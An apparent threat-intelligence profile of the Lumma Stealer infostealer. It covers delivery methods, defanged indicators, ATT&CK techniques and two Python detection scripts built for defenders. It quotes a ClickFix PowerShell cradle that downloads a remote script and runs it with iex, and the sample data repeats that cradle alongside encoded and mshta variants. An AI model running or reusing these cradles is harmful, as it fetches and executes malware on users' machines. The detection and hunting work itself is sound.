Lumma Stealer
Lumma Stealer, also referred to as Lumma and LummaC2, is a commercial malware-as-a-service infostealer that has been openly traded on Russian-speaking cybercrime forums since 2022. Microsoft tracks its core developer as Storm-2477. It was described as one of the most prevalent infostealer services in 2025 until an international law-enforcement and industry disruption in May 2025. The malware is used by affiliates rather than a single threat actor group; operators generate builds and retrieve stolen logs through a centralized web panel.
Its core capability is theft of browser session cookies, saved logins, passwords, autofill data, cryptocurrency wallets, browser-extension data, MFA-related data, and financial credentials. Public reporting states that Lumma logs are widely sold on illicit forums and that ransomware syndicates and other criminal actors have used Lumma-sourced credentials to obtain initial access to corporate networks. In Black Basta activity, Lumma has been referenced both as a credential-theft tool and as a dropper for additional malware.
Observed delivery vectors include phishing emails disguised as hotel bookings or invoices, fake CAPTCHA and ClickFix social-engineering chains, malvertising, poisoned search ads for common software, cracked or pirated software, GitHub and cracked-software forum lures, and distribution by other malware loaders such as Amadey. Several reported campaigns relied on tricking users into opening the Windows Run dialog and executing clipboard-pasted PowerShell or mshta commands, which then downloaded and launched Lumma in the background. One campaign used compromised websites and EtherHiding infrastructure with payload components stored on Binance Smart Chain; another targeted visitors of Arabic pirated-movie sites and abused a legitimate Adobe-signed executable vulnerable to DLL sideloading, with the malicious sqlite.dll it loaded identified as Lumma Stealer.
Reporting ties Lumma to widespread criminal use and downstream ecosystem activity: Black Basta used LummaC2, Amadey clusters frequently delivered Lumma payloads, and Lumma was among the leading observed infections in Mexico in 2025. INTERPOL reporting cited here also listed Lumma among the top banking trojan and infostealer families in Asia and the South Pacific.
High-confidence indicators and technical details reported for this family include fake CAPTCHA chains with Win+R/Ctrl+V execution, PowerShell and mshta download cradles, Prometheus TDS redirection to binadata[.]com in a Canada-targeted campaign, retrieval of a JavaScript stage from 185.147.125[.]174, EtherHiding infrastructure referencing data-seed-prebsc-1-s1.bnbchain[.]org and check.foquh[.]icu, and a hard-coded anti-analysis failsafe that hashes the local username and computer name and exits if the values match 0x56CF7626 or 0xB09406C7. Additional campaign-specific IOCs tied to Lumma delivery include accentypastedw[.]store, onefreex[.]com, rentry[.]co, 188.114.97[.]3, 104.26.3[.]16, 172.67.194[.]91, filehere0987[.]b-cdn[.]net, and SHA-1 bfc1422d1c5351561087bd3e6d82ffbad5221dae for a malicious sqlite.dll identified as Lumma Stealer. Note that the three IP addresses fall in Cloudflare address space and that rentry[.]co and b-cdn[.]net are shared public services, so a hit on those alone is weak evidence; pivot on the full domain, URL path, and file hash before acting.
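The indicators above are published defanged, and several of them sit on shared infrastructure, so the first practical step is to normalize them and weight each hit by how specific the indicator is. The following Python is an added example, not code from this page or from any vendor it cites: it refangs the IOCs listed above, classifies them, and matches them against constructed sample telemetry. The hostnames, file path, the updates.example.com query and the event record format are invented; the Cloudflare prefixes and the shared-service domains are assumptions that should be verified against current data before use.

```python
import ipaddress
import re
from urllib.parse import urlparse

# Indicators as published in the profile above, copied in their defanged form.
PAGE_IOCS = [
    "binadata[.]com", "185.147.125[.]174", "data-seed-prebsc-1-s1.bnbchain[.]org",
    "check.foquh[.]icu", "accentypastedw[.]store", "onefreex[.]com", "rentry[.]co",
    "188.114.97[.]3", "104.26.3[.]16", "172.67.194[.]91", "filehere0987[.]b-cdn[.]net",
    "bfc1422d1c5351561087bd3e6d82ffbad5221dae",
]
# Shared infrastructure (assumption: Cloudflare-published prefixes at time of writing,
# and public paste/CDN services). A hit on these alone is weak evidence.
SHARED_CDN_NETS = [ipaddress.ip_network(n) for n in
                   ("104.24.0.0/14", "172.64.0.0/13", "188.114.96.0/20")]
SHARED_SERVICE_DOMAINS = {"rentry.co", "b-cdn.net"}
HASH_TYPES = {32: "md5", 40: "sha1", 64: "sha256"}

def refang(value):
    """Turn a defanged indicator (x[.]y, hxxp://) back into its real, lower-cased form."""
    v = value.strip()
    v = re.sub(r"\[\.\]|\(\.\)|\{\.\}", ".", v)
    v = re.sub(r"\[:\]", ":", v)
    v = re.sub(r"\[@\]", "@", v)
    v = re.sub(r"^hxxp", "http", v, flags=re.IGNORECASE)
    return v.lower()

def classify(value):
    """Label a refanged indicator as md5/sha1/sha256, ip, url, domain or unknown."""
    if len(value) in HASH_TYPES and re.fullmatch(r"[0-9a-f]+", value):
        return HASH_TYPES[len(value)]
    try:
        ipaddress.ip_address(value)
        return "ip"
    except ValueError:
        pass
    if re.match(r"https?://", value):
        return "url"
    if re.fullmatch(r"([a-z0-9-]+\.)+[a-z]{2,}", value):
        return "domain"
    return "unknown"

def build_index(iocs):
    """Group refanged indicators by type so each lookup is a set membership test."""
    index = {}
    for raw in iocs:
        v = refang(raw)
        index.setdefault(classify(v), set()).add(v)
    return index

def parent_domains(name):
    """Yield a.b.c, b.c, c so a subdomain of a listed domain still matches."""
    labels = name.lower().rstrip(".").split(".")
    for i in range(len(labels)):
        yield ".".join(labels[i:])

def domain_hit(name, index):
    return next((d for d in parent_domains(name) if d in index.get("domain", ())), None)

def ip_confidence(ip):
    addr = ipaddress.ip_address(ip)
    return "low" if any(addr in net for net in SHARED_CDN_NETS) else "high"

def domain_confidence(ioc):
    return "low" if any(p in SHARED_SERVICE_DOMAINS for p in parent_domains(ioc)) else "high"

def match_events(events, index):
    """Scan telemetry records (dns, netflow, proxy, file) and return IOC hits."""
    hits = []
    for ev in events:
        kind, host = ev["type"], ev["host"]
        if kind in ("dns", "proxy"):
            name = ev["query"] if kind == "dns" else (urlparse(ev["url"]).hostname or "")
            ioc = domain_hit(name, index)
            if ioc:
                hits.append((host, kind, ioc, domain_confidence(ioc)))
        elif kind == "netflow" and ev["dst_ip"] in index.get("ip", ()):
            hits.append((host, kind, ev["dst_ip"], ip_confidence(ev["dst_ip"])))
        elif kind == "file":
            for algo in ("md5", "sha1", "sha256"):
                h = ev.get(algo, "").lower()
                if h and h in index.get(algo, ()):
                    hits.append((host, kind, h, "high"))
    return hits

# Constructed sample telemetry, not real logs; hosts and paths are invented.
SAMPLE_EVENTS = [
    {"type": "dns", "host": "ws01", "query": "check.foquh.icu"},
    {"type": "dns", "host": "ws01", "query": "updates.example.com"},
    {"type": "netflow", "host": "ws02", "dst_ip": "188.114.97.3"},
    {"type": "netflow", "host": "ws02", "dst_ip": "185.147.125.174"},
    {"type": "file", "host": "ws03", "path": r"C:\Users\u\AppData\Local\Temp\sqlite.dll",
     "sha1": "BFC1422D1C5351561087BD3E6D82FFBAD5221DAE"},
    {"type": "proxy", "host": "ws04", "url": "https://filehere0987.b-cdn.net/zuni.txt"},
]

def run_sample():
    """Match the constructed events against the page's IOCs: five hits, two low-confidence."""
    return match_events(SAMPLE_EVENTS, build_index(PAGE_IOCS))
```

Running run_sample() returns five tuples of (host, event type, matched indicator, confidence): the Cloudflare-hosted IP and the b-cdn.net hostname come back as low confidence, the direct IP, the check.foquh.icu lookup and the sqlite.dll SHA-1 as high. Hash matching is case-insensitive because EDR products disagree on casing; domain matching walks parent suffixes so a new subdomain of a listed domain is still caught.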
Vulnerabilities exploited
1 CVE Mallory has correlated with this family across public research and vendor advisories.
CVE-2026-1731 (BeyondTrust RS/PRA; CVSS 9.8; public exploit: Yes (GitHub); vendor advisory: Yes (BT26-02)) ... Evidence: CVE-2026-1731 (BeyondTrust) is associated with HAFNIUM and linked to Lumma Stealer, SparkRAT, and VShell malware deployments.
Groups observed using it
31 distinct threat actors attributed by public researchers.
And the most prolific tool for stealing it, until law enforcement hit it in 2025, was a piece of malware called Lumma. Lumma (also known as LummaC2) isn't a single cybercrime gang—it is a commercial product.
A recent campaign, active at least since December 2024, is promoting LummaStealer disguised as cracked software... Upon extraction the final payload is a LummaStealer executable.
Additional tradecraft and techniques: Usage of open-source tooling: ScreenConnect, FleetDeck, AnyDesk, RustDesk, Splashtop, Pulseway, TightVNC, LummaC2, Level.io, Mesh, TacticalRMM, Tailscale, Ngrok, WsTunnel, Rsocx, and Socat.
Groups like TA2727 use similar JavaScript injects and lures to distribute their own malware, including information stealers like Lumma and DeerStealer.
Among these threats, Lumma Stealer has emerged as a particularly sophisticated player since its introduction in 2022 by the threat actor known as Lumma. Initially marketed as LummaC2, this information stealer quickly gained traction in underground forums, with prices starting at $250.
We examined this payload and concluded that it is the Lumma Trojan stealer (Trojan-PSW.Win32.Lumma). The Lumma stealer gathers system and installed software information from the compromised devices, as well as sensitive data such as cookies, usernames, passwords, banking card numbers, and connection logs.
Techniques & procedures
27 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development (2 techniques)
Initial Access (3 techniques)
Those forums embed malicious JS into button clicks that redirect them to intermediate domains (.cfd, .click, .info, .xyz TLDs). These domains deliver the final download URL hosted on MEGA cloud storage...
Execution (6 techniques)
Researchers discovered dozens of malicious wallpapers on Steam Workshop that abused Wallpaper Engine's Application Wallpaper feature to execute malware on users' PCs.
The PowerShell command that the user was asked to paste and run was: powershell.exe -W Hidden -command $url = 'https://filehere0987[.]b-cdn[.]net/zuni[.]txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; iex $text. The rule below detects any PowerShell execution from the Run dialog with suspicious commands, such as hidden execution (-W Hidden), iex, or encoded commands (-encodedCommand).
Check the RunMRU key: review HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU, which records commands entered in the Run dialog, for evidence of pasted malicious commands.
In one notable campaign, attackers injected JavaScript into compromised websites... This script then fetched the ClickFix lure and executed mshta via check.foquh[.]icu.
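To make the Run-dialog observations above testable, here is an added Python example; it is neither the detection rule the excerpt refers to nor code from this page or its sources. It parses a constructed RunMRU export, scores command lines for the cradle signals named above (-W Hidden, iex, -encodedCommand, mshta with a URL), looks inside a decoded -EncodedCommand payload, and applies the same check to constructed Sysmon-style process-creation events whose parent is explorer.exe, which is how Win+R launches show up in telemetry. Hostnames, paths and lure.example.net are invented; the RunMRU value layout (values a, b, c ... ending in "\1", ordered by MRUList) is how Windows stores the key.

```python
import base64
import re

# Constructed export of HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU.
# Windows stores each Run-dialog entry as a value named a, b, c ... whose data is
# the command followed by "\1"; MRUList lists the value names most-recent first.
SAMPLE_RUNMRU = {
    "MRUList": "cab",
    "a": "notepad\\1",
    "b": "mstsc\\1",
    "c": ("powershell.exe -W Hidden -command $url = 'https://filehere0987.b-cdn.net/zuni.txt'; "
          "$response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response.Content; "
          "iex $text\\1"),
}

# Signals that a pasted one-liner is a download cradle rather than an admin command.
# Flag patterns cover PowerShell's abbreviations (-w/-win/-WindowStyle, -e/-ec/-enc).
SIGNALS = [
    ("hidden_window", re.compile(r"-w[a-z]*\s+hidden", re.I)),
    ("invoke_expression", re.compile(r"\biex\b|invoke-expression", re.I)),
    ("download_cradle", re.compile(
        r"invoke-webrequest|\biwr\b|\birm\b|invoke-restmethod|downloadstring|"
        r"downloadfile|net\.webclient|start-bitstransfer|\bcurl\b|\bwget\b", re.I)),
    ("mshta_remote", re.compile(r"mshta(?:\.exe)?\s+\"?(?:https?|vbscript|javascript):", re.I)),
    ("remote_url", re.compile(r"https?://", re.I)),
    ("encoded_command", re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/]{16,}={0,2})", re.I)),
]
ENCODED_RE = SIGNALS[-1][1]
RUN_DIALOG_CHILDREN = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "curl.exe"}

def decode_encoded_command(b64):
    """-EncodedCommand payloads are base64 of UTF-16LE text; return '' if not decodable."""
    try:
        return base64.b64decode(b64 + "=" * (-len(b64) % 4)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def analyze_command(cmd):
    """Return the signal names present in a command line, including those found
    after decoding an -EncodedCommand payload (prefixed 'encoded:')."""
    found = [name for name, rx in SIGNALS if rx.search(cmd)]
    m = ENCODED_RE.search(cmd)
    if m:
        inner = decode_encoded_command(m.group(1))
        found += ["encoded:" + name for name, rx in SIGNALS if rx.search(inner)]
    return found

def parse_runmru(values):
    """Return Run-dialog history most-recent first with the trailing '\\1' stripped."""
    cmds = []
    for name in values.get("MRUList", ""):
        data = values.get(name)
        if data is not None:
            cmds.append(data[:-2] if data.endswith("\\1") else data)
    return cmds

def hunt_runmru(values):
    """Triage a RunMRU export: (command, signals) for every entry that trips a signal."""
    return [(c, analyze_command(c)) for c in parse_runmru(values) if analyze_command(c)]

def hunt_process_events(events):
    """Flag Sysmon/4688-style process creations spawned by explorer.exe (the Run
    dialog's parent) whose command line carries cradle signals."""
    hits = []
    for ev in events:
        parent = ev["parent_image"].rsplit("\\", 1)[-1].lower()
        image = ev["image"].rsplit("\\", 1)[-1].lower()
        if parent != "explorer.exe" or image not in RUN_DIALOG_CHILDREN:
            continue
        signals = analyze_command(ev["command_line"])
        if signals:
            hits.append((ev["host"], image, signals))
    return hits

# Constructed process-creation events (hosts, paths and lure.example.net are invented).
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
EXPLORER = r"C:\Windows\explorer.exe"
ENCODED_SAMPLE = base64.b64encode(
    'iex (New-Object Net.WebClient).DownloadString("https://lure.example.net/p")'
    .encode("utf-16-le")).decode()
SAMPLE_PROCESS_EVENTS = [
    {"host": "ws01", "parent_image": EXPLORER, "image": PS,
     "command_line": parse_runmru(SAMPLE_RUNMRU)[0]},
    {"host": "ws02", "parent_image": EXPLORER, "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://lure.example.net/captcha.hta"},
    {"host": "ws03", "parent_image": EXPLORER, "image": PS,
     "command_line": f"powershell.exe -nop -w hidden -enc {ENCODED_SAMPLE}"},
    {"host": "ws04", "parent_image": r"C:\Windows\System32\cmd.exe", "image": PS,
     "command_line": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"host": "ws05", "parent_image": EXPLORER, "image": PS, "command_line": "powershell.exe"},
]
```

hunt_process_events(SAMPLE_PROCESS_EVENTS) flags ws01 (hidden window, iex, Invoke-WebRequest, URL), ws02 (mshta with a remote URL) and ws03 (where the cradle only appears after the -enc payload is decoded); the scheduled backup script on ws04 and the bare powershell.exe on ws05 are not flagged. The explorer.exe parent check is a heuristic, since double-clicking a script gives the same parent, so the command-line signals carry the weight; on a live host, read the RunMRU values with reg export or Get-ItemProperty and feed them to hunt_runmru.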
Persistence (2 techniques)
Privilege Escalation (1 technique)
Stealth, i.e. Defense Evasion in ATT&CK terms (4 techniques)
This report covers infostealers disguised as illegal software such as cracks and keygens... Microsoft Corporation was the most frequently impersonated company, followed by Auslogics, NVIDIA Corporation, Virtual Holding Resources, LLC, and Adobe Inc.
Another distinct, Canada-targeted email cluster routed victims through the Prometheus TDS (Traffic Direction System) to binadata[.]com.
Credential Access (4 techniques)
When successfully deployed and executed, information-stealing malware can harvest credentials (usernames, passwords, and session cookies) from infected environments and export them as logs to the attackers’ server.
The wristband is called a session cookie. And the most prolific tool for stealing it, until law enforcement hit it in 2025, was a piece of malware called Lumma... Once an attacker extracts your session cookie, they can import it directly into their own web browser and seamlessly become you.
Discovery (1 technique)
Collection (3 techniques)
Banking trojans and information stealers materialized as the second most prevalent type of cybercrime, with malware families like RedLine, Lumma, LokiBot, Negasteal, and ZBot taking up the top spots.
Command and Control (3 techniques)
This script performed three main actions: Downloaded a ZIP file and extracted it into the AppData directory.
IOCs tracked for this family
1,064 indicators attributed across vendor reports, sandbox runs, and researcher write-ups, covering IPs, domains, and DNS infrastructure; file hashes (MD5, SHA-1, SHA-256) from samples and reports; and other indicator types observed in public reporting.
Recent activity
200 sources tracked across advisories, community write-ups, and news.
An infostealer sold under a malware-as-a-service model that steals browser session cookies, saved logins, passwords, autofill data, cryptocurrency wallets, MFA-related data, and financial credentials, enabling account takeover by reusing authenticated sessions.
Information-stealing malware that was among the leading observed infections in Mexico in 2025.
Lumma Stealer is mentioned as a payload distributed by a large botnet cluster within the Amadey ecosystem.
Named as an infostealer family in the broader infostealer ecosystem and also described as downstream malware delivered by Amadey.